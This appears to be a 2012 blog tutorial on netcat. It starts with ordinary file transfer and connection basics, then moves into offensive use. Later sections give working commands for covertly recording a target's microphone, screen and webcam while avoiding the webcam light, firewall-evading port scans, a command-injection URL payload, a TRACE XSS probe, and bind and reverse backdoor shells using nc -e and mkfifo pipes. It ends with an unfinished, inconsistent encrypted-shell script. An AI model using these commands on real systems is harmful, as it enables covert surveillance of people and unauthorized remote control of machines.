Saturday, May 19, 2012

NETCAT the Swiss Knife

Full NetCat Overview

The basics of Netcat can be found in the man page which is good for beginners, you can find the man page for your version of netcat by typing this in the terminal:
$ man nc
If you don't like reading man pages through the terminal you can install the package "man2html" which makes it possible to read the manuals through the browser or just Google the man page with the query "man <program>" ("man nc" in our case).

Make netcat listen for a connection

Command
nc -l <port>
Result
Netcat will start to listen on the defined <port>, as soon as something makes a full 3-way TCP handshake to the port there is the possibility of transferring data, the connection can be closed at any time from both sides; once the connection is closed the netcat process is also stopped and the port will be closed again.
Example
nc -l 1337
Notes
1. You may need the -p parameter to define the port; in most versions this is not required (nc -l -p 1337).
2. If you want to force netcat to stay listening after one connection you can use the -k flag. (nc -l -k 1337)
3. Using the -v (verbose) flag will make netcat output who is connecting (over stderr), this is good to know when using the -k flag because it is possible that there are different computers connecting to you.
4. Flags can be parsed in a chain like this: "nc -lkv 1337".

Make netcat connect

Command
nc <computer> <port>
Result
Netcat will establish a 3-way TCP handshake to the defined computer/port, when succeeded you can talk with the computer/port with the keyboard (stdin).
Example
nc www.hackingmachinetools.blogspot.com 80
Notes
1. Adding the "-v" (verbose) flag is a nice check to see if a website is up. Here is an example:
$ nc -v www.hackingmachinetools.blogspot.com 80
 
Connection to www.hackingmachinetools.blogspot.com
 80 port [tcp/www] succeeded!

Using files during connections

It is possible to save the data which is send to you or you can give netcat a file which should be sended when a connection is made.
Here is an example on how to save the data which is being send by the server:
$ nc hackingmachinetools.blogspot.com80 > response
# you can now send data but you won't see the output from the server because it is being redirected to a file.
$ nc hackingmachinetools.blogspot.com 80 > response
 
HEAD / HTTP/0.1

$ cat response
HTTP/1.1 200 OK
Date: <timestamp>
Server: Apache
Last-Modified: <timestamp>
Accept-Ranges: bytes
Content-Length: 3383
Connection: close
Content-Type: text/html
It is also possible to give netcat a file which should be pushed over the connection as soon as netcat connects, here is an example where we make the local computer listen over port 1337 and netcat will connect to it and push a file through the connection.
# First we need a file so let's create one already.
$ echo "Hello world" > file
# In another terminal we make netcat listen on port 1337 and wait for the file.
$ nc -l 1337
# Now we are going to connect to the port and push the file through the connection.
$ nc localhost 1337 < file
# Look on in the terminal where you just made netcat listen, here is the output:
$ nc -l 1337
Hello world
# You may have noticed that the connection was terminated, this is normal when you push a file through the connection netcat will terminate it when the eof is reached.
Alright, now let's try to do some cool things with this.
We can transfer files this way by making netcat listen on the first side of the connection and capture it on the other side.
# First make it listen and tell it to capture the output to a file.
$ nc -l 1337 > backup.tar.gz
# Now connect to it and push a file in it
$ nc localhost 1337 < backup.tar.gz
# Now you got a file which is called "backup.tar.gz" and contains the same content on both sides.
Or reversed...
# Now make the server listen and anything that connects to it will get the file backup.tar.gz
$ nc -l 1337 < backup.tar.gz
# On the other side connect and save the contents
$ nc localhost 1337 > backup.tar.gz
# Same result: a copy of backup.tar.gz is made.
You can also monitor files this way:
# Make netcat listen, this time we do it with a pipe symbol, this is just another way to get the job done.
$ tail -f /var/log/apache2/access.log | nc -l 1337
# Connect to it
$ nc localhost 1337
<ip> - - [<timestamp>] <user agent>
<ip> - - [<timestamp>] <user agent>
<ip> - - [<timestamp>] <user agent>
<streaming output of /var/log/apache2/access.log>
# The connection will stay open and if there are any new requests you will immediately receive them.
Here is another very cool example, here we are going live eavesdrop the microphone of the target:
# We are going to use arecord for this and all output will be written to whatever is connected to port 1337.
arecord -f dat -t raw | nc -l 1337
# Now we have to connect to this port with netcat and we want to convert all data which is being send to .ogg format so we can hear it.
nc localhost 1337 | oggenc - -r -o nc.ogg
# Now just open nc.ogg with ogg123/vlc or something you like and you will have a live stream with your target's microphone. It will also save all the data to nc.ogg which is good for when you later want to analyze what people said.
The same method can be used for eavesdropping the screen/webcam/anything you like, just find a nice package which can do the job for you.
For desktop and sound eavesdropping the package "recordmydesktop" is good when it's installed.
Getting a good streaming connection with screen and sound is pretty hard so what I did to get it to work is just make a dumpfile like this:
recordmydesktop --on-the-fly-encoding --overwrite -o /tmp/nc.ogv
And later transfer the entire contents to me the way we earlier transferred files.
nc -l 1337 < /tmp/nc.ogv
Then you can just view the video and recorded sound.
Be sure you don't let the entire hard disk overflow with this because it will stay recording, a simple command can kill the recordmydesktop process again.
$ killall recordmydesktop
Or just find the pid with the program ps and kill the pid.
Eavesdropping the webcam with nc is very detectable due to the blinking light/steady green light on the webcam these days, what you can do is just making pictures which will only make it blink very fast, I you can use various packets for it but I will demonstrate it here with streamer.
# First you make a photo and save it in /tmp/image.jpeg, then you set netcat to listen and let it present the photo once somebody connects to it.
$ while [ 1 ]; do streamer -o /tmp/photo.jpeg; nc -l 1337 < /tmp/photo.jpeg; done
# On the other side you connect to it and save the current image.
$ nc localhost 1337 > image.jpeg
# Now the picture will get updated and when reconnecting you will get a new picture real time.
The same idea can be implemented for screenshots.
# listen
$ while true; do import -window root /tmp/image.png; nc -l 1337 < /tmp/image.png; done
# and connect
$ nc localhost 1337 > image.png
# Screenshot is updated and you can grab a new screenshot.

Portscan a target with netcat

Command
nc -zv <target> <port/port range> 2>&1 | grep succeeded
Result
Netcat will start trying to make full 3-way TCP handshakes over the port/port range.
-> SYN
-> ACK
nmap does it a little bit different and injects a RST packet instead of an ACK, this causes the connection to not fully get established and is way more stealthy.
-> SYN
-> RST
"2>&1" is because we want to redirect stderr (standard error) and stdout (standard output) both to a file, I will be using this a lot in the following port scan examples so remember this.
Example
nc -zv 10.13.37.1 1-3400 2>&1 | grep succeeded
Notes
1. When using something like a PHP RCE exploit and you don't have a streaming connection through a shell it is useful to pipe the output to a file. Here is an example of how to do so:
nc -zv 10.13.37.1 1-3400 2>&1 | grep succeeded > /tmp/10.13.37.1.txt
#Inject it where you got a remote code execution exploit, here is an example:
#http://att.ackack.net/imageviewer.php?ls=/var/www/images/'; nc -zv 10.13.37.1 1-3400 2>&1 | grep succeeded > /tmp/10.13.37.1.txt; echo '
#This will happen server side in this example: $ ls '/var/www/images/'; nc -zv 10.13.37.1 1-3400 2>&1 | grep succeeded > /tmp/10.13.37.1.txt; echo '';

Portscan a network range with netcat

method 1, subnet scanning
# We will be scanning the subnet 10.13.37.1/24 for port 80, results can be found back in /tmp/pscan and it is all multi tasked so this shouldn't take longer than a second or 2.
$ range="10.13.37."; port=80; for host in $(seq 1 255); do multi_task=$(result=$(nc -zv $range$host $port 2>&1 | grep succeeded); if [ -n "$result" ]; then echo $range$host":"$port >> "/tmp/pscan"; fi;) & done
method 2, list based scanning
# You will need a file filled with hosts for this, I used /tmp/hosts which contained:
# 10.13.37.1
# 10.13.37.23
# google.com
# 10.13.37.173
# ackack.net
$ port=80; for host in $(cat /tmp/hosts); do multi_task=$(result=$(nc -zv $host $port 2>&1 | grep succeeded); if [ -n "$result" ]; then echo $host":"$port >> "/tmp/pscan"; fi;) & done
# It's all multi tasked again and the structure is pretty similar to the method 1.
method 3, network subnet scanning all ports on all hosts
Extremely noisy to firewalls and might eat a lot of CPU but it works, you can also save it to a file and issue it with the command "nice -n 20" this makes it a little nicer for your CPU.
$ range="10.13.37."; for host in $(seq 1 255); do multi_task=$(result=$(nc -zv $range$host 1-65535 2>&1 | grep succeeded); if [ -n "$result" ]; then echo $result >> "/tmp/pscan"; fi;) & done
method 4 list based scanning with delay
Some delay between the ports is good for letting the firewalls think there is nothing special going on.
This will scan all the hosts in /tmp/hosts on ports 20-100 with 1 second delay between the ports and save the results to /tmp/pscan.
#!/bin/sh
range="10.13.37."
ports=$(seq 20 100)
for host in $(cat /tmp/hosts); do
 for port in $ports; do
  result=$(nc -zv $range$host $port 2>&1 | grep succeeded);
  if [ -n "$result" ]; then
   echo $range$host":"$port >> "/tmp/pscan";
  fi;
  sleep 1;
 done
done
Notes
1. If you don't want multi tasked scanning which can be pretty extensive and noisy replace the "& done" for "; done".
2. Adding the -r flag will make the source and or destination port ranges random instead of letting the system assign which ports to use.

Banner grabbing

Port scanning is fun but we can't do a lot with this until we properly fingerprinted the programs behind the ports, this can be done with a technique called banner grabbing.
Now that the scripts are getting bigger and bigger I won't be displaying one liners anymore, you will have to write the files to filenames and execute them.
Here is a script which will port scan and banner grab automatically with netcat.
It will check for the SSH and MySQL version by connecting and saving the results and it will see if the HTTP server is vulnerable to the TRACE method, look in the dumpfile /tmp/bannergrab and look for "<script>alert(123)</script>" if you can find that back you got yourself a vulnerable server.
#!/bin/sh
range="192.168.1.";
# You can change this to a port range $(seq 20 25) is port 20-25
ports="22 80 3306";

http_header="HEAD / HTTP/0.1\n\n";

for host in $(seq 137 139); do
 for port in $ports; do
  echo "[+] Testing "$range$host":"$port;
  result=$(nc -zv $range$host $port 2>&1 | grep succeeded);
  if [ -n "$result" ]; then
   echo "\n"$range$host":"$port"\n" >> "/tmp/bannergrab"
   if [ "$port" -eq "22" ]; then
    echo "Found open port "$range$host":"$port" Here might be some SSH server, it echoes the SSH version to you on connecting when lucky.";
    nc -v $range$host $port -w 1 >> "/tmp/bannergrab";
   fi;
   if [ "$port" -eq "80" ]; then
    echo "Found open port "$range$host":"$port" Trying to fingerprint with HEAD and see if the server is vulnerable to TRACE XSSing";
    echo $http_header | nc -v -w 2 $range$host $port >> "/tmp/bannergrab"
    echo "TRACE / HTTP/1.1\nHost: $range$host\nuser-agent: <script>alert(123)</script>\n\n" | nc -v -w 2 $range$host $port >> "/tmp/bannergrab"
   fi;
   if [ "$port" -eq "3306"]; then
    echo "Found open port "$range$host":"$port" Possible MySQL installation found, saving the banner for later inspection, the MySQL version can be found in this.";
    nc -v $range$host $port -w 1 >> "/tmp/bannergrab";
   fi;
  fi;
 done
done

Basic netcat backdoor shells

There is a flag "-e" in netcat, with this you can let netcat automatically listen with the specified program, it has been removed because of the security issues related to this, there has been a public exploit exploiting a buffer overflow in this since 2004 on windows and there has not been a patch.
# For *nix systems you can use this:
$ nc -l -e /bin/sh localhost 1337
# And for Windows systems you can use this:
$ nc -l -e cmd.exe cmd.exe 1337
Just another reminder, you might need the -p flag before the port, in the latest versions this is not required but the later versions also don't support the -e flag.
Once you executed this command on the computer you can simply netcat in it and you will have your shell.
You may wonder why a buffer overflow is a problem in a function which is mainly for creating a backdoor, it's because there are mail server scripts and things like that which depend on netcat.
You can also just give it another program for example this would open a port and echo anything back.
$ nc -l -e /bin/cat localhost 1337
Here you don't have supposedly a backdoor running but with the buffer overflow you could exploit it.
Anyway, let's reverse things, listening shells are way too detectable and when there is some basic port forwarding you can't get in already.
This way you will make yourself listen and netcat will connect to you and give you a shell.
# You do:
$ nc -lv 1337
# And on the machine you want to backdoor you do:
$ nc -e /bin/sh <Your IP> 1337
Be sure the remote computer can reach you over that port, when you have a home user setup you probably just have to go inside your router and port forward the port to your computer to make it work.

Better netcat backdoor shells

Since the -e flag has been removed in most versions we have to hack our way around it.
Here is a basic exmple of how to do so:
mkfifo /tmp/pipe;
sh /tmp/pipe | nc -l 1337 > /tmp/pipe
Just connect to it and you got a shell.
Here is the reversed version:
mkfifo /tmp/pipe
sh /tmp/pipe | nc localhost 1338 > /tmp/pipe
Unencrypted shell streams are very easy to sniff, we should encrypt them.
!under consruction! - blowfish encryption
#!/bin/sh
# This script is for the connecting client.

password="secret";

echo $1 > cache_cmd;
openssl enc -bf -pass pass:passwd -in cache_cmd | nc localhost 1337

#!/bin/sh
# This script is for the listening server.

password="secret";

openssl enc -bf -d -in $1 -pass pass:$password -out cache;
cat cache;

#tiny notes
openssl enc -bf -d -in pipe -pass pass:passwd | nc -l 1337 > pipe

openssl enc -bf -pass pass:passwd -in cache_cmd | nc localhost 1337